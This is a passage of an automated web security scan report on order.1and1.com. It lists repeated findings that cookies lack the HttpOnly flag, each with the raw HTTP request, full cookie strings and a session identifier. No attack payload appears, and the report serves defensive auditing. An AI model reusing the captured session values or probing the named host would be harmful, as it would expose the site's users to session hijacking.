The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Domaininfo HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=69cc255bf110d400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/DomaininfoMove HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=17a1be1e9220e400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Eshops HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7e3e5cc19ca64c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsChat HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=74fc0aa587c04000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsDialogue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7baf8e23846d6000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsMerchandise HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2a108f85d005a000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureCommunicationToolsNewsletter HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=73692ad413d39c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureControlCenter HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=39c7e664d5cb4800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseAccess HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=37397528d82e9400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseDatabase HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=282c3b09cb862800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDatabaseMssql HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2a749cb4eb8e1800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
